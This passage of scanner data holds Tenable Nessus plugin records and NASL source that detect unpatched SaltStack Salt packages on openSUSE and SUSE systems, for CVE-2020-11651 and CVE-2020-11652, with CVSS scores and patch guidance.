script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:saltstack:salt\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"saltstack_salt_linux_installed.nbin\");\n script_require_keys(\"installed_sw/SaltStack Salt Master\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'SaltStack Salt Master');\n\nvcf::check_all_backporting(app_info:app_info);\n\nconstraints = [\n { 'fixed_version' : '2019.2.0', 'fixed_display' : '2019.2.4, 3000.2 or later.' },\n { 'min_version' : '2019.2.0', 'fixed_version' : '2019.2.4' },\n { 'min_version' : '3000.0', 'fixed_version' : '3000.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:13:27", "description": "This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "nessus", "title": "openSUSE Security Update : salt (openSUSE-2020-564)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:python3-salt", "p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-564.NASL", "href": "https://www.tenable.com/plugins/nessus/136306", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136306);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-564)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\n - Fix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", 
reference:\"salt-standalone-formulas-configuration-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-2019.2.0-lp151.5.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-2019.2.0-lp151.5.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:10:08", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1151-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1151-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136170);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201151-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6df3c979\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1151=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt 
Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-2019.2.0-5.67.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:10:09", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable 
Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-30T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1150-1.NASL", "href": 
"https://www.tenable.com/plugins/nessus/136169", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1150-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136169);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1150-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201150-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?85e05fec\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1:zypper in\n-t patch SUSE-SLE-Module-Server-Applications-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Python2-15-SP1-2020-1150=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-SP1-2020-1150=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", 